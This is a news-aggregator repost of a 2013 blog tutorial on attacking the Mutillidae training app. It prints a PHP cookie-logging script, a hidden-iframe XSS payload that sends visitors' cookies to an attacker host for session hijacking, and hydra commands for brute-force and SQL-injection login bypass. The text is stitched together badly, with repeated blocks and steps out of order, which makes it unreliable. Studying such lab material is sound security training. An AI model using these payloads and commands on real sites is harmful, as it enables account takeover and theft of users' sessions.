Welcome to our
Cyber Security News Aggregator
.Cyber Tzar
provide acyber security risk management
platform; including automated penetration tests and risk assesments culminating in a "cyber risk score" out of 1,000, just like a credit score.
First slide label
Some representative placeholder content for the first slide.
Second slide label
Some representative placeholder content for the second slide.
Third slide label
Some representative placeholder content for the third slide.
Broken Authentication & Session Management in Mutillidae
published on 2013-11-20 08:34:00 UTC by nirav desaiContent:
Broken Authentication and Session Management is on number 2 in OWASP Top 10 vulnerability list 2013. In mutillidae , it contain three subsection.
We have already covered Username enumeration in last article & we got valid username list which exist in database. Today we are going to use authentication bypass method.
Now as anonymous user , we will add blog entry.I used other OS on my virtual box for attack.
(1)Open http://192.168.56.1/mutillidae/index.php?page=add-to-your-blog.php
(2)Submit following html to blog
(6)After reload we got admin access to web-application.
- Authentication Bypass
- Privilege Escalation
- Username Enumeration
We have already covered Username enumeration in last article & we got valid username list which exist in database. Today we are going to use authentication bypass method.
- Using cookie
- Using brute-force
- Using SQL injection
(1)Authentication Bypass using cookie:-
As we know that , mutillidae is vulnerable to XSS, so we can capture cookie with help of XSS. We are going to take advantage of persistent XSS.
http://127.0.0.1/mutillidae/index.php?page=add-to-your-blog.php
Above link is vulnerable to persistent XSS attack. We can submit html to add blog section.so we are going to use cookie-catcher.
Content of cookie_catcher.php :-
<?php
header ("Location: http://192.168.56.1");
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
Upload your cookie_catcher.php to server. For demo i used my local apache server & after execution of script it will redirect to 192.168.56.1.You can change the code according to your need. It will grab IP, cookie, Referer, time & date.
http://127.0.0.1/mutillidae/index.php?page=add-to-your-blog.php
Above link is vulnerable to persistent XSS attack. We can submit html to add blog section.so we are going to use cookie-catcher.
Content of cookie_catcher.php :-
<?php
header ("Location: http://192.168.56.1");
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
Upload your cookie_catcher.php to server. For demo i used my local apache server & after execution of script it will redirect to 192.168.56.1.You can change the code according to your need. It will grab IP, cookie, Referer, time & date.
Now as anonymous user , we will add blog entry.I used other OS on my virtual box for attack.
(1)Open http://192.168.56.1/mutillidae/index.php?page=add-to-your-blog.php
(2)Submit following html to blog
<html>
<body>
<b> nirav k desai</b>
<u>help me</u>
<iframe frameboarder=0 height=0 width=0 src=javascript:void(document.location="http://192.168.56.1/cookie_catcher.php?c="+document.cookie) </iframe >
</body>
</html>
<body>
<b> nirav k desai</b>
<u>help me</u>
<iframe frameboarder=0 height=0 width=0 src=javascript:void(document.location="http://192.168.56.1/cookie_catcher.php?c="+document.cookie) </iframe >
</body>
</html>
Replace Link http://192.168.56.1/cookie_catcher.php to your uploaded cookie_catcher.php
(3)Now when "admin" or any "logged user" show your added blog entry , you will get his cookie, i.p., date & time.
(3)Now when "admin" or any "logged user" show your added blog entry , you will get his cookie, i.p., date & time.
(4)To view cookie open cookie.html.
(5)Now you can use any cookie manager add-on to edit cookie; replace cookie which we got.
(6)After reload we got admin access to web-application.
(2)Authentication Bypass Using bruteforce:-
You can use hydra or burpe intruder to bruteforce login form of application.
hydra -l admin -P /root/pass.txt 127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"
hydra -l admin -P /root/pass.txt 127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"
(3)Authentication Bypass Using sql injection:-
We can inject special database characters or SQL timing attacks into page parameters. We are going to use login page; and inject sql character to login form.
You can use SQL injection cheat sheet & we will brute-force using SQL statements.Save it to file.
hydra -l admin -P /root/sql 127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"
You can use SQL injection cheat sheet & we will brute-force using SQL statements.Save it to file.
hydra -l admin -P /root/sql 127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"
And we got for valid SQL statements ; with help of it we can bypass admin panel.
https://tipstrickshack.blogspot.com/2013/11/broken-authentication-session.html
Published: 2013 11 20 08:34:00
Received: 2021 06 06 09:05:02
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Views: 1
